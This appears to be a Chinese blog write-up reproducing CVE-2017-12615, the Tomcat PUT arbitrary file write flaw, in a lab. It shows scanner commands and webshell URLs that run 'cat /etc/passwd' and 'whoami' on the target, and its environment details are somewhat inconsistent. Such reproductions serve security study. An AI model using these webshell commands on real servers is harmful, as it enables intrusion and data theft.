apache-tomcat_7.0.0 - 7.0.81_file-write_CVE-2017-12615

Apache-Tomcat_7.0.0 - 7.0.81_PUT方法任意写文件漏洞_CVE-2017-12615

说明内容
漏洞编号CVE-2017-12615
漏洞名称Tomcat PUT方法任意写文件漏洞
漏洞评级高危
影响范围Apache Tomcat 7.0.0 - 7.0.81
漏洞描述配置不当,导致可以使用PUT方法上传任意文件
修复方案升级

漏洞描述

当 Tomcat 运行在 Windows 主机上,且启用了 HTTP PUT 请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求向服务器上传包含任意代码的 JSP 文件。之后,JSP 文件中的代码将能被服务器执行。

漏洞的产生是由于配置不当(非默认配置),将配置文件(conf/web.xml)中的readonly设置为了false,导致可以使用PUT方法上传任意文件,但限制了jsp后缀,不过对于不同平台有多种绕过方法

漏洞等级

高危

影响版本

  • Apache Tomcat 7.0.0 - 7.0.81

漏洞复现

基础环境

组件版本
OSkali-linux
Web Serverchrome
Apache Tomcat8.5.19

漏洞扫描

可以使用nacs进行扫描

sudo ./nacs -h 192.168.117.163 -pa 80

在这里插入图片描述

可以使用nuclei进行扫描

./nuclei -u 192.168.117.163

在这里插入图片描述

漏洞验证

进入nuclei所给的漏洞地址

http://192.168.117.163/poc.jsp?cmd=cat+%2Fetc%2Fpasswd

在这里插入图片描述

深度利用

命令执行

对url进行修改即可达到命令执行,如

http://192.168.117.163/poc.jsp?cmd=whoami

在这里插入图片描述

漏洞挖掘

网络测绘

Apache-tomcat 7.0.0-7.0.81

修复建议

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

cwangc000

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值